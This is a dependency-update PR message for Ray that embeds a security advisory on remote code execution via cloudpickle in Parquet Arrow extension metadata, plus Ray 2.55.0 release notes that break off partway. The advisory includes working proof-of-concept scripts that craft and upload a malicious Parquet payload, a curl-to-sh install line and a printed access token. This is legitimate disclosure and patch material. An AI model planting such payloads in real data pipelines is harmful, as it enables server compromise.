Commit 69b3fc6
Update dependency ray to v2.55.0 [SECURITY] - abandoned (#7629)
> ℹ️ **Note**
>
> This PR body was truncated due to platform limits.
This PR contains the following updates:
| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [ray](https://redirect.github.com/ray-project/ray) | `2.54.0` →
`2.55.0` |

|

|
---
> [!WARNING]
> Some dependencies could not be looked up. Check the [Dependency
Dashboard](../issues/357) for more information.
---
### Ray: Remote Code Execution via Parquet Arrow Extension Type
Deserialization
[CVE-2026-41486](https://nvd.nist.gov/vuln/detail/CVE-2026-41486) /
[GHSA-mw35-8rx3-xf9r](https://redirect.github.com/advisories/GHSA-mw35-8rx3-xf9r)
<details>
<summary>More information</summary>
#### Details
##### Remote Code Execution via Parquet Arrow Extension Type
Deserialization
##### Summary
Ray Data registers custom Arrow extension types
(`ray.data.arrow_tensor`, `ray.data.arrow_tensor_v2`,
`ray.data.arrow_variable_shaped_tensor`) globally in PyArrow. When
PyArrow reads a Parquet file containing one of these extension types, it
calls `__arrow_ext_deserialize__` on the field's metadata bytes. Ray's
implementation passes these bytes directly to `cloudpickle.loads()`,
achieving arbitrary code execution during schema parsing, before any row
data is read.
In May 2024, Ray fixed a related vulnerability in
`PyExtensionType`-based extension types ([issue
#​41314](https://redirect.github.com/ray-project/ray/issues/41314),
[PR
#​45084](https://redirect.github.com/ray-project/ray/pull/45084)).
In July 2025, [PR
#​54831](https://redirect.github.com/ray-project/ray/pull/54831)
introduced `cloudpickle.loads()` into the replacement extension types'
deserialization path, reintroducing the same class of vulnerability.
Note: Source links in this report are pinned to the Ray 2.54.0 release
commit (`48bd1f8fa4`) for stable line references. We also re-verified
the same vulnerable code paths on current `master` as of March 17, 2026.
##### Details
##### Extension type registration
Ray Data registers three Arrow extension types globally in PyArrow:
```python
##### python/ray/data/_internal/tensor_extensions/arrow.py:1603-1605
pa.register_extension_type(ArrowTensorType((0,), pa.int64()))
pa.register_extension_type(ArrowTensorTypeV2((0,), pa.int64()))
pa.register_extension_type(ArrowVariableShapedTensorType(pa.int64(), 0))
```
Registration happens at module load time
([`__init__.py:94-95`](https://redirect.github.com/ray-project/ray/blob/48bd1f8fa4/python/ray/data/__init__.py#L94-L95)),
and any use of `ray.data` triggers it. Once registered, PyArrow
automatically calls `__arrow_ext_deserialize__` whenever it encounters
these extension type names in any Parquet file's schema, including files
from untrusted sources.
##### The code path to `cloudpickle.loads()`
All three extension types inherit from
`ArrowExtensionSerializeDeserializeCache`, whose
`__arrow_ext_deserialize__` method
([`arrow.py:176-179`](https://redirect.github.com/ray-project/ray/blob/48bd1f8fa4/python/ray/data/_internal/tensor_extensions/arrow.py#L176-L179))
delegates to subclass methods that ultimately call
`_deserialize_with_fallback()`:
```python
##### python/ray/data/_internal/tensor_extensions/arrow.py:84-96
def _deserialize_with_fallback(serialized: bytes, field_name: str = "data"):
"""Deserialize data with cloudpickle first, fallback to JSON."""
try:
# Try cloudpickle first (new format)
return cloudpickle.loads(serialized) # <-- arbitrary code execution
except Exception:
# Fallback to JSON format (legacy)
try:
return json.loads(serialized)
except json.JSONDecodeError:
raise ValueError(
f"Unable to deserialize {field_name} from {type(serialized)}"
)
```
The `serialized` bytes come directly from the Parquet file's field-level
metadata (`ARROW:extension:metadata`) with no validation.
`cloudpickle.loads()` is tried **first**, meaning a crafted payload will
always be executed before the safe JSON fallback is reached.
For `ArrowTensorType`, the call chain is:
```
__arrow_ext_deserialize__(cls, storage_type, serialized) # arrow.py:176
-> _arrow_ext_deserialize_cache(serialized, value_type) # arrow.py:178
-> _arrow_ext_deserialize_compute(serialized, value_type) # arrow.py:652
-> _deserialize_with_fallback(serialized, "shape") # arrow.py:653
-> cloudpickle.loads(serialized) # arrow.py:88 RCE
```
`ArrowTensorTypeV2`
([`arrow.py:679-680`](https://redirect.github.com/ray-project/ray/blob/48bd1f8fa4/python/ray/data/_internal/tensor_extensions/arrow.py#L679-L680))
and `ArrowVariableShapedTensorType`
([`arrow.py:1076-1077`](https://redirect.github.com/ray-project/ray/blob/48bd1f8fa4/python/ray/data/_internal/tensor_extensions/arrow.py#L1076-L1077))
follow the same pattern.
##### Why the existing mitigation doesn't help
After issue
[#​41314](https://redirect.github.com/ray-project/ray/issues/41314),
Ray added `check_for_legacy_tensor_type()` in
[`parquet_datasource.py:146-170`](https://redirect.github.com/ray-project/ray/blob/48bd1f8fa4/python/ray/data/_internal/datasource/parquet_datasource.py#L146-L170)
to block the old `PyExtensionType`-based tensor types:
```python
##### python/ray/data/_internal/datasource/parquet_datasource.py:146-170
def check_for_legacy_tensor_type(schema):
"""Check for the legacy tensor extension type and raise an error if found.
Ray Data uses an extension type to represent tensors in Arrow tables. Previously,
the extension type extended `PyExtensionType`. However, this base type can expose
users to arbitrary code execution. To prevent this, we don't load the type by
default.
"""
for name, type in zip(schema.names, schema.types):
if isinstance(type, pa.UnknownExtensionType) and isinstance(
type, pa.PyExtensionType
):
raise RuntimeError(...)
```
This guard checks for `PyExtensionType` / `UnknownExtensionType`. It
does **not** check for the currently-registered `ray.data.arrow_tensor`
types, which are the ones that call `cloudpickle.loads()`. Additionally,
the check runs after PyArrow has already deserialized the schema, so
even if it checked for the current types, the code execution would have
already occurred.
##### Outside Ray's documented threat model
Ray's [security
documentation](https://docs.ray.io/en/latest/ray-security/index.html)
states that Ray relies on network isolation and "extensively uses
cloudpickle." This vulnerability does not require cluster access. The
payload arrives through a Parquet file from cloud storage, a data lake,
HuggingFace, or a shared filesystem. A perfectly firewalled Ray cluster
is vulnerable if it reads a crafted file.
##### Impact
- **Affected versions**: Ray 2.49.0 through 2.54.0 (latest release as of
March 2026). The vulnerable `_deserialize_with_fallback` function with
`cloudpickle.loads()` was introduced in commit `f6d21db1a4` ([PR
#​54831](https://redirect.github.com/ray-project/ray/pull/54831),
July 2025), first released in Ray 2.49.0.
- **Affected configurations**: Any process that uses Ray Data and reads
Parquet files. The extension types are registered globally in PyArrow,
so all Parquet reads in the process are affected, including
`ray.data.read_parquet()`, `pyarrow.parquet.read_table()`,
`pandas.read_parquet()`, etc.
- **Attacker prerequisites**: The attacker must place a crafted Parquet
file where a Ray Data pipeline reads it. No authentication or cluster
access is required. The Parquet file must contain a column with a
`ray.data.arrow_tensor` (or v2, or variable-shaped) extension type name,
which makes this a targeted attack against Ray Data users.
- **CIA impact**: Arbitrary command execution as the Ray worker process
user, resulting in full server compromise.
- **Severity**: Critical
##### Attack scenarios
1. **HuggingFace datasets**: Ray's documentation
[recommends](https://docs.ray.io/en/latest/data/loading-data.html#reading-files-from-hugging-face)
reading Parquet datasets from HuggingFace using
`ray.data.read_parquet("hf://datasets/...", filesystem=HfFileSystem())`.
Anyone can create a HuggingFace dataset containing a crafted Parquet
file. A tensor column with `ray.data.arrow_tensor` metadata is normal
for an ML dataset, as tensor columns are a core Ray Data feature. We
verified this scenario end-to-end with a private HuggingFace dataset
(see PoC below).
2. **Multi-tenant ML platforms**: Organizations running shared Ray
clusters where multiple teams submit data processing jobs. If one team
can write Parquet files to shared storage that another team reads, the
writer can execute arbitrary code in the reader's context.
3. **Compromised data pipelines**: An upstream data producer writes
Parquet files with crafted tensor column metadata. The payload survives
because standard Parquet tools preserve extension metadata
transparently.
##### PoC
We provide two reproductions: a minimal local PoC and a full end-to-end
scenario via HuggingFace.
**Prerequisites:** Python 3.12+ and
[uv](https://docs.astral.sh/uv/getting-started/installation/) (`curl
-LsSf https://astral.sh/uv/install.sh | sh`).
##### PoC 1: Local file
Creates a valid Parquet file with a tensor column whose extension
metadata contains a crafted cloudpickle payload. Reading the file with
Ray Data triggers code execution during schema parsing.
**1. Create the Parquet file:**
```bash
cat > craft_parquet.py << 'SCRIPT'
import cloudpickle
import pyarrow as pa
import pyarrow.parquet as pq
COMMAND = "id > /tmp/ray-tensor-rce-proof"
class Trigger:
def __reduce__(self):
return (eval, (f"(__import__('os').system({COMMAND!r}), (1,))[1]",))
storage_type = pa.list_(pa.int64())
schema = pa.schema([
pa.field("tensor", storage_type, metadata={
b"ARROW:extension:name": b"ray.data.arrow_tensor",
b"ARROW:extension:metadata": cloudpickle.dumps(Trigger()),
}),
pa.field("id", pa.int64()),
pa.field("text", pa.string()),
])
table = pa.Table.from_arrays([
pa.array([[1, 2, 3], [4, 5, 6]], type=storage_type),
pa.array([1, 2]),
pa.array(["hello", "world"]),
], schema=schema)
pq.write_table(table, "crafted.parquet")
print("Created crafted.parquet")
SCRIPT
uv run --with 'cloudpickle,pyarrow' python craft_parquet.py
```
**2. Read it with Ray Data:**
```bash
rm -f /tmp/ray-tensor-rce-proof
uv run --with 'ray[data]' python -c "
import ray.data
ray.data.read_parquet('crafted.parquet')
"
cat /tmp/ray-tensor-rce-proof
##### Expected: output of 'id' — confirms code execution
```
##### PoC 2: End-to-end via HuggingFace
This demonstrates the realistic attack scenario: a crafted Parquet file
hosted as a HuggingFace dataset, read by a Ray cluster following [Ray's
own
documentation](https://docs.ray.io/en/latest/data/loading-data.html#reading-files-from-hugging-face).
We uploaded a crafted Parquet file to a private HuggingFace dataset at
[`antiproof/parquet-tensor-disclosure`](https://huggingface.co/datasets/antiproof/parquet-tensor-disclosure).
The file looks like a normal ML dataset with tensor, id, and text
columns. The read-only token below gives access.
**Upload script** (for reference, this is how we seeded the dataset):
```bash
cat > upload_dataset.py << 'SCRIPT'
##### /// script
##### requires-python = ">=3.10"
##### dependencies = ["cloudpickle", "pyarrow", "huggingface_hub"]
##### ///
"""Upload a crafted Parquet file to a HuggingFace dataset.
Prerequisites: huggingface-cli login (with a write token)
Usage: uv run upload_dataset.py <repo_id> <command>
"""
import sys, tempfile
from pathlib import Path
import cloudpickle, pyarrow as pa, pyarrow.parquet as pq
from huggingface_hub import HfApi
def build_parquet(output, command):
class Trigger:
def __reduce__(self):
return (eval, (f"(__import__('os').system({command!r}), (1,))[1]",))
storage_type = pa.list_(pa.int64())
schema = pa.schema([
pa.field("tensor", storage_type, metadata={
b"ARROW:extension:name": b"ray.data.arrow_tensor",
b"ARROW:extension:metadata": cloudpickle.dumps(Trigger()),
}),
pa.field("id", pa.int64()),
pa.field("text", pa.string()),
])
table = pa.Table.from_arrays([
pa.array([[1, 2, 3], [4, 5, 6]], type=storage_type),
pa.array([1, 2]),
pa.array(["hello", "world"]),
], schema=schema)
pq.write_table(table, str(output))
repo_id, command = sys.argv[1], sys.argv[2]
with tempfile.TemporaryDirectory() as tmpdir:
parquet = Path(tmpdir) / "train.parquet"
build_parquet(parquet, command)
HfApi().upload_file(
path_or_fileobj=str(parquet),
path_in_repo="data/train.parquet",
repo_id=repo_id, repo_type="dataset",
)
print(f"Uploaded to https://huggingface.co/datasets/{repo_id}")
SCRIPT
##### We ran:
##### uv run upload_dataset.py antiproof/parquet-tensor-disclosure 'id > /tmp/ray-tensor-rce-proof'
```
**Reproduce** (reads the dataset from HuggingFace, no local files
needed):
```bash
rm -f /tmp/ray-tensor-rce-proof
HF_TOKEN=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 \
uv run --with 'ray[data],huggingface_hub' python -c "
import ray.data
from huggingface_hub import HfFileSystem
ray.data.read_parquet(
'hf://datasets/antiproof/parquet-tensor-disclosure/data/train.parquet',
filesystem=HfFileSystem(),
)
"
cat /tmp/ray-tensor-rce-proof
##### Expected: output of 'id' — confirms code execution via HuggingFace dataset
```
The token above is read-only. The dataset is private to prevent
unintended exposure.
##### Suggested fix
The extension metadata stores simple values (a shape tuple like `(3,
224, 224)` or an ndim integer). These do not require cloudpickle.
1. **Replace `cloudpickle.loads()` in `_deserialize_with_fallback()`
with `json.loads()`.** The tensor shape and ndim are JSON-serializable.
For backward compatibility with files written using the current
cloudpickle format, gate `cloudpickle.loads()` behind an opt-in
environment variable (following the pattern already established with
`RAY_DATA_AUTOLOAD_PYEXTENSIONTYPE`).
2. **Serialize new extension type metadata as JSON by default.**
`json.dumps([3, 224, 224])` carries the same information as
`cloudpickle.dumps((3, 224, 224))`, without the code execution risk.
3. **Add a security note to `read_parquet()` documentation** explaining
that Parquet files from untrusted sources can execute arbitrary code
when tensor extension types are registered.
Please contact security@antiproof.ai with any questions about this
disclosure policy or related security research.
#### Severity
- CVSS Score: 8.9 / 10 (High)
- Vector String:
`CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H`
#### References
-
[https://github.com/ray-project/ray/security/advisories/GHSA-mw35-8rx3-xf9r](https://redirect.github.com/ray-project/ray/security/advisories/GHSA-mw35-8rx3-xf9r)
-
[https://github.com/advisories/GHSA-mw35-8rx3-xf9r](https://redirect.github.com/advisories/GHSA-mw35-8rx3-xf9r)
This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-mw35-8rx3-xf9r)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>
---
### Release Notes
<details>
<summary>ray-project/ray (ray)</summary>
###
[`v2.55.0`](https://redirect.github.com/ray-project/ray/releases/tag/ray-2.55.0)
[Compare
Source](https://redirect.github.com/ray-project/ray/compare/ray-2.54.1...ray-2.55.0)
#### Ray Data
##### 🎉 New Features
- Add `DataSourceV2` API with scanner/reader framework, file listing,
and file partitioning
([#​61220](https://redirect.github.com/ray-project/ray/issues/61220),
[#​61615](https://redirect.github.com/ray-project/ray/issues/61615),
[#​61997](https://redirect.github.com/ray-project/ray/issues/61997))
- Support GPU shuffle with `rapidsmpf` 26.2
([#​61371](https://redirect.github.com/ray-project/ray/issues/61371),
[#​62062](https://redirect.github.com/ray-project/ray/issues/62062))
- Add Kafka datasink, migrate to `confluent-kafka`, support `datetime`
offsets
([#​60307](https://redirect.github.com/ray-project/ray/issues/60307),
[#​61284](https://redirect.github.com/ray-project/ray/issues/61284),
[#​60909](https://redirect.github.com/ray-project/ray/issues/60909))
- Add Turbopuffer datasink
([#​58910](https://redirect.github.com/ray-project/ray/issues/58910))
- Add 2-phase commit checkpointing with trie recovery and load method
([#​61821](https://redirect.github.com/ray-project/ray/issues/61821),
[#​60951](https://redirect.github.com/ray-project/ray/issues/60951))
- Queue-based autoscaling policy integrated with task consumers
([#​59548](https://redirect.github.com/ray-project/ray/issues/59548),
[#​60851](https://redirect.github.com/ray-project/ray/issues/60851))
- Enable autoscaling for GPU stages
([#​61130](https://redirect.github.com/ray-project/ray/issues/61130))
- Expressions: add `random()`, `uuid()`, `cast`, and map namespace
support
([#​59656](https://redirect.github.com/ray-project/ray/issues/59656),
[#​60695](https://redirect.github.com/ray-project/ray/issues/60695),
[#​59879](https://redirect.github.com/ray-project/ray/issues/59879))
- Add support for Arrow native fixed-shape tensor type
([#​56284](https://redirect.github.com/ray-project/ray/issues/56284))
- Support writing tensors to tfrecords
([#​60859](https://redirect.github.com/ray-project/ray/issues/60859))
- Add `pathlib.Path` support to `read_*` functions
([#​61126](https://redirect.github.com/ray-project/ray/issues/61126))
- Add `cudf` as a `batch_format`
([#​61329](https://redirect.github.com/ray-project/ray/issues/61329))
- Allow `ActorPoolStrategy` for `read_datasource()` via `compute`
parameter
([#​59633](https://redirect.github.com/ray-project/ray/issues/59633))
- Introduce `ExecutionCache` for streamlined caching
([#​60996](https://redirect.github.com/ray-project/ray/issues/60996))
- Support `strict=False` mode for `StreamingRepartition`
([#​60295](https://redirect.github.com/ray-project/ray/issues/60295))
- Port changes from lance-ray into Ray Data
([#​60497](https://redirect.github.com/ray-project/ray/issues/60497))
- Enable PyArrow compute-to-expression conversion for predicate pushdown
([#​61617](https://redirect.github.com/ray-project/ray/issues/61617))
- Add vLLM metrics export and Data LLM Grafana dashboard
([#​60385](https://redirect.github.com/ray-project/ray/issues/60385))
- Include logical memory in resource manager scheduling decisions
([#​60774](https://redirect.github.com/ray-project/ray/issues/60774))
- Add monotonically increasing ID support
([#​59290](https://redirect.github.com/ray-project/ray/issues/59290))
##### 💫 Enhancements
- Performance: cache `_map_task` args, heap-based actor ranking, actor
pool map improvements
([#​61996](https://redirect.github.com/ray-project/ray/issues/61996),
[#​62114](https://redirect.github.com/ray-project/ray/issues/62114),
[#​61591](https://redirect.github.com/ray-project/ray/issues/61591))
- Optimize concat tables and PyArrow schema hashing
([#​61315](https://redirect.github.com/ray-project/ray/issues/61315),
[#​62108](https://redirect.github.com/ray-project/ray/issues/62108))
- Reduce default `DownstreamCapacityBackpressurePolicy` threshold to 50%
([#​61890](https://redirect.github.com/ray-project/ray/issues/61890))
- Improve reproducibility for random APIs
([#​59662](https://redirect.github.com/ray-project/ray/issues/59662))
- Clamp batch size to fall within C++ 32-bit int range
([#​62242](https://redirect.github.com/ray-project/ray/issues/62242))
- Account for external consumer object store usage in resource manager
budget
([#​62117](https://redirect.github.com/ray-project/ray/issues/62117))
- Make `get_parquet_dataset` configurable in number of fragments to scan
([#​61670](https://redirect.github.com/ray-project/ray/issues/61670))
- Consolidate schema inference and make all preprocessors implement
`SerializablePreprocessorBase`
([#​61213](https://redirect.github.com/ray-project/ray/issues/61213),
[#​61341](https://redirect.github.com/ray-project/ray/issues/61341))
- Disable hanging issue detection by default
([#​62405](https://redirect.github.com/ray-project/ray/issues/62405))
- Make execution callback dataflow explicit to prevent state leakage
([#​61405](https://redirect.github.com/ray-project/ray/issues/61405))
- Log `DataContext` in JSON format at execution start for traceability
([#​61150](https://redirect.github.com/ray-project/ray/issues/61150),
[#​61428](https://redirect.github.com/ray-project/ray/issues/61428))
- Autoscaler: configurable traceback, Prometheus gauges, relaxed
constraints
([#​62210](https://redirect.github.com/ray-project/ray/issues/62210),
[#​62209](https://redirect.github.com/ray-project/ray/issues/62209),
[#​61917](https://redirect.github.com/ray-project/ray/issues/61917),
[#​61385](https://redirect.github.com/ray-project/ray/issues/61385))
- Add metrics for task scheduling time, output backpressure, and logical
memory
([#​61192](https://redirect.github.com/ray-project/ray/issues/61192),
[#​61007](https://redirect.github.com/ray-project/ray/issues/61007),
[#​61436](https://redirect.github.com/ray-project/ray/issues/61436))
- Prevent operators from dominating entire shared object store budget
([#​61605](https://redirect.github.com/ray-project/ray/issues/61605))
- Eliminate generators to avoid intermediate state pinning
([#​60598](https://redirect.github.com/ray-project/ray/issues/60598))
- Default log encoding to UTF-8 on Windows
([#​61143](https://redirect.github.com/ray-project/ray/issues/61143))
- Remove legacy `BlockList`, `locality_with_output`, old callback API,
PyArrow 9.0 checks
([#​60575](https://redirect.github.com/ray-project/ray/issues/60575),
[#​61044](https://redirect.github.com/ray-project/ray/issues/61044),
[#​62055](https://redirect.github.com/ray-project/ray/issues/62055),
[#​61483](https://redirect.github.com/ray-project/ray/issues/61483))
- Upgrade to `pyiceberg` 0.11.0; cap `pandas` to <3
([#​61062](https://redirect.github.com/ray-project/ray/issues/61062),
[#​60406](https://redirect.github.com/ray-project/ray/issues/60406))
- Refactor logical operators to frozen dataclasses
([#​61059](https://redirect.github.com/ray-project/ray/issues/61059),
[#​61308](https://redirect.github.com/ray-project/ray/issues/61308),
[#​61348](https://redirect.github.com/ray-project/ray/issues/61348),
[#​61349](https://redirect.github.com/ray-project/ray/issues/61349),
[#​61351](https://redirect.github.com/ray-project/ray/issues/61351),
[#​61364](https://redirect.github.com/ray-project/ray/issues/61364),
[#​61481](https://redirect.github.com/ray-project/ray/issues/61481))
- Prevent aggregator head node scheduling
([#​61288](https://redirect.github.com/ray-project/ray/issues/61288))
- Add error for `local://` paths with a zero-resource head node
([#​60709](https://redirect.github.com/ray-project/ray/issues/60709))
##### 🔨 Fixes
- Fix RCE in Arrow extension type deserialization from Parquet
([#​62056](https://redirect.github.com/ray-project/ray/issues/62056))
- Fix `StreamingSplitDataIterator.schema()`
([#​62057](https://redirect.github.com/ray-project/ray/issues/62057))
- Fix `ParquetDatasource` handling of `FileSystemFactory.inspect`
([#​62065](https://redirect.github.com/ray-project/ray/issues/62065))
- Fix `read_parquet` file-extension filtering for versioned object-store
URIs
([#​61376](https://redirect.github.com/ray-project/ray/issues/61376))
- Fix `wide_schema_pipeline_tensors` cloudpickle deserialization
([#​62149](https://redirect.github.com/ray-project/ray/issues/62149))
- Fix `OpBufferQueue` race condition
([#​60828](https://redirect.github.com/ray-project/ray/issues/60828))
- Fix scheduling metrics computation
([#​62031](https://redirect.github.com/ray-project/ray/issues/62031))
- Fix `OneHotEncoder` `max_categories` to use global top-k instead of
per-partition
([#​60790](https://redirect.github.com/ray-project/ray/issues/60790))
- Fix `ReservationOpResourceAllocator` resource borrowing for
`ActorPoolMapOperator`
([#​60882](https://redirect.github.com/ray-project/ray/issues/60882))
- Fix `DatabricksUCDatasource` `schema()` shadowing by schema string
attribute
([#​61282](https://redirect.github.com/ray-project/ray/issues/61282))
- Fix `AliasExpr` structural equality to respect rename flag
([#​60711](https://redirect.github.com/ray-project/ray/issues/60711))
- Fix `_align_struct_fields` failure with unaligned scalar fields
([#​58364](https://redirect.github.com/ray-project/ray/issues/58364))
- Fix `min_scheduling_resources` fallback to
`incremental_resource_usage`
([#​60997](https://redirect.github.com/ray-project/ray/issues/60997))
- Fix output backpressure unblocking sequence for terminal ops
([#​60798](https://redirect.github.com/ray-project/ray/issues/60798))
- Fix multi-input operator object store memory attribution
([#​61208](https://redirect.github.com/ray-project/ray/issues/61208))
- Fix reference cycle by moving to module scope
([#​61934](https://redirect.github.com/ray-project/ray/issues/61934))
- Fix autoscaler logging: reduce verbose output and move traceback to
debug
([#​61989](https://redirect.github.com/ray-project/ray/issues/61989),
[#​62126](https://redirect.github.com/ray-project/ray/issues/62126))
- Fix double counting `ref_bundle` + `input_files`
([#​61774](https://redirect.github.com/ray-project/ray/issues/61774))
- Replace `on_exit` hook with `__ray_shutdown__` to fix UDF cleanup race
([#​61700](https://redirect.github.com/ray-project/ray/issues/61700))
- Prevent `Limit` from getting pushed past `map_groups`
([#​60881](https://redirect.github.com/ray-project/ray/issues/60881))
- Propagate schema in empty `_shuffle_block` to fix `ColumnNotFound` in
chained left joins
([#​61507](https://redirect.github.com/ray-project/ray/issues/61507))
- Fix unclear metadata warning and incorrect operator name logging
([#​61380](https://redirect.github.com/ray-project/ray/issues/61380))
- Clamp rolling utilization averages to zero
([#​61543](https://redirect.github.com/ray-project/ray/issues/61543))
- Fix floating point errors in `TimeWindowAverageCalculator`
([#​61580](https://redirect.github.com/ray-project/ray/issues/61580))
- Remove default task-level timeout and clamp `end_offset` in Kafka
datasource
([#​61476](https://redirect.github.com/ray-project/ray/issues/61476))
- Avoid redundant reads in `train_test_split`
([#​60274](https://redirect.github.com/ray-project/ray/issues/60274))
- Return `None` when no outputs have been produced
([#​62029](https://redirect.github.com/ray-project/ray/issues/62029))
- Replace bare `raise` with `TypeError` in string concatenation
([#​60795](https://redirect.github.com/ray-project/ray/issues/60795))
##### 📖 Documentation
- Add job-level checkpointing documentation
([#​60921](https://redirect.github.com/ray-project/ray/issues/60921))
- Update `exclude_resources` docs for Train autoscaling changes
([#​61990](https://redirect.github.com/ray-project/ray/issues/61990))
- Add `locality_with_output` migration instructions
([#​61151](https://redirect.github.com/ray-project/ray/issues/61151))
- Document `max_tasks_in_flight_per_actor` vs `max_concurrent_batches`
([#​60477](https://redirect.github.com/ray-project/ray/issues/60477))
- Add missing `MOD` operation docs; improve `ray.data.Datasource` docs
([#​60803](https://redirect.github.com/ray-project/ray/issues/60803),
[#​59654](https://redirect.github.com/ray-project/ray/issues/59654))
- Add `polars` usage instructions
([#​60029](https://redirect.github.com/ray-project/ray/issues/60029))
#### Ray Serve
##### 🎉 New Features:
- Added end-to-end gRPC client and bidirectional streaming support,
including public APIs, proxy handling, proto updates, and developer
docs, so Serve apps can handle streaming workloads natively instead of
building custom transport layers.
([#​60767](https://redirect.github.com/ray-project/ray/issues/60767),
[#​60768](https://redirect.github.com/ray-project/ray/issues/60768),
[#​60769](https://redirect.github.com/ray-project/ray/issues/60769),
[#​60770](https://redirect.github.com/ray-project/ray/issues/60770),
[#​60771](https://redirect.github.com/ray-project/ray/issues/60771))
- Introduced HAProxy-based serving with fallback proxy support and
load-balancer tunables, giving operators a higher-throughput ingress
path and more control over traffic behavior in production.
([#​60586](https://redirect.github.com/ray-project/ray/issues/60586),
[#​61180](https://redirect.github.com/ray-project/ray/issues/61180),
[#​61271](https://redirect.github.com/ray-project/ray/issues/61271),
[#​61468](https://redirect.github.com/ray-project/ray/issues/61468),
[#​61988](https://redirect.github.com/ray-project/ray/issues/61988))
- Added queue-based autoscaling for async inference and Taskiq-backed
workloads, so scaling decisions can account for both HTTP in-flight load
and queued tasks.
([#​59548](https://redirect.github.com/ray-project/ray/issues/59548),
[#​60851](https://redirect.github.com/ray-project/ray/issues/60851),
[#​60977](https://redirect.github.com/ray-project/ray/issues/60977),
[#​61008](https://redirect.github.com/ray-project/ray/issues/61008))
- Rolled out gang scheduling support across validation, core scheduling,
fault tolerance, downscaling, autoscaling, rolling updates, and
migration, enabling coordinated multi-replica placement for tightly
coupled workloads.
([#​60944](https://redirect.github.com/ray-project/ray/issues/60944),
[#​61205](https://redirect.github.com/ray-project/ray/issues/61205),
[#​61206](https://redirect.github.com/ray-project/ray/issues/61206),
[#​61207](https://redirect.github.com/ray-project/ray/issues/61207),
[#​61215](https://redirect.github.com/ray-project/ray/issues/61215),
[#​61467](https://redirect.github.com/ray-project/ray/issues/61467),
[#​61216](https://redirect.github.com/ray-project/ray/issues/61216),
[#​61659](https://redirect.github.com/ray-project/ray/issues/61659))
- Introduced deployment-scoped actors with config/schema, lifecycle
management, public API, and controller health checks, making it easier
to run durable per-deployment sidecar-like logic inside Serve.
([#​61639](https://redirect.github.com/ray-project/ray/issues/61639),
[#​61648](https://redirect.github.com/ray-project/ray/issues/61648),
[#​61664](https://redirect.github.com/ray-project/ray/issues/61664),
[#​61833](https://redirect.github.com/ray-project/ray/issues/61833),
[#​62161](https://redirect.github.com/ray-project/ray/issues/62161))
##### 💫 Enhancements:
- Added first-class tracing support for Serve, including
inter-deployment gRPC propagation and richer streaming-path attributes,
improving end-to-end observability across distributed request flows.
([#​61230](https://redirect.github.com/ray-project/ray/issues/61230),
[#​61089](https://redirect.github.com/ray-project/ray/issues/61089),
[#​61451](https://redirect.github.com/ray-project/ray/issues/61451))
- Expanded operational metrics with replica utilization, richer error
labeling, and client IP logging in access logs, helping teams diagnose
bottlenecks and user-impacting issues faster.
([#​60758](https://redirect.github.com/ray-project/ray/issues/60758),
[#​61092](https://redirect.github.com/ray-project/ray/issues/61092),
[#​60967](https://redirect.github.com/ray-project/ray/issues/60967))
- Improved autoscaling extensibility with class-based policies and
`policy_kwargs`, so advanced users can package reusable autoscaling
logic without custom forks.
([#​60964](https://redirect.github.com/ray-project/ray/issues/60964))
- Reduced controller overhead with broad algorithmic improvements
(indexing, cache reuse, and avoiding repeated per-tick work), which
improves scalability as deployment and replica counts grow.
([#​60810](https://redirect.github.com/ray-project/ray/issues/60810),
[#​60829](https://redirect.github.com/ray-project/ray/issues/60829),
[#​60830](https://redirect.github.com/ray-project/ray/issues/60830),
[#​60838](https://redirect.github.com/ray-project/ray/issues/60838),
[#​60842](https://redirect.github.com/ray-project/ray/issues/60842),
[#​60843](https://redirect.github.com/ray-project/ray/issues/60843),
[#​60844](https://redirect.github.com/ray-project/ray/issues/60844),
[#​60832](https://redirect.github.com/ray-project/ray/issues/60832),
[#​60806](https://redirect.github.com/ray-project/ray/issues/60806))
- Improved throughput-oriented operation controls by adding
environment-based tuning and explicit throughput optimization logging,
making performance behavior easier to configure and audit.
([#​60757](https://redirect.github.com/ray-project/ray/issues/60757),
[#​62146](https://redirect.github.com/ray-project/ray/issues/62146))
- Upgraded Serve internals to Pydantic v2 and refined time-series
aggregation behavior for more predictable metric accuracy under high
load.
([#​61061](https://redirect.github.com/ray-project/ray/issues/61061),
[#​61403](https://redirect.github.com/ray-project/ray/issues/61403))
##### 🔨 Fixes:
- Fixed a direct-ingress shutdown bug where replicas could hang
indefinitely while draining stuck requests, ensuring bounded shutdown
behavior in failure scenarios.
([#​60754](https://redirect.github.com/ray-project/ray/issues/60754))
- Fixed HAProxy reliability issues, including config race conditions,
draining guards, and platform compatibility edge cases, improving
stability in production rollouts.
([#​61120](https://redirect.github.com/ray-project/ray/issues/61120),
[#​60955](https://redirect.github.com/ray-project/ray/issues/60955))
- Fixed autoscaling correctness issues that could cause runaway scaling
or delayed reactions, including feedback-loop regressions, streaming
scale-down behavior, and wall-clock delay handling.
([#​61731](https://redirect.github.com/ray-project/ray/issues/61731),
[#​61920](https://redirect.github.com/ray-project/ray/issues/61920),
[#​62331](https://redirect.github.com/ray-project/ray/issues/62331),
[#​61844](https://redirect.github.com/ray-project/ray/issues/61844),
[#​60613](https://redirect.github.com/ray-project/ray/issues/60613))
- Fixed high-percentile latency regression in request routing and
queue-length accounting, reducing tail-latency spikes under load.
([#​61755](https://redirect.github.com/ray-project/ray/issues/61755))
- Fixed replica-state and health-state edge cases during migration and
ingress transitions, preventing false errors and unhealthy/healthy
misreporting.
([#​60365](https://redirect.github.com/ray-project/ray/issues/60365),
[#​61818](https://redirect.github.com/ray-project/ray/issues/61818),
[#​62213](https://redirect.github.com/ray-project/ray/issues/62213))
- Fixed chained upstream actor-failure handling so request failures are
attributed correctly and no longer hang when upstream deployments die
mid-chain.
([#​61758](https://redirect.github.com/ray-project/ray/issues/61758),
[#​62147](https://redirect.github.com/ray-project/ray/issues/62147))
- Fixed HTTP status classification for client disconnects after
successful responses, improving accuracy of error-rate monitoring and
alerting.
([#​61396](https://redirect.github.com/ray-project/ray/issues/61396))
##### 📖 Documentation:
- Added `AsyncInferenceAutoscalingPolicy` documentation and clarified
Serve performance guidance for HAProxy and inter-deployment gRPC use
cases.
([#​61086](https://redirect.github.com/ray-project/ray/issues/61086),
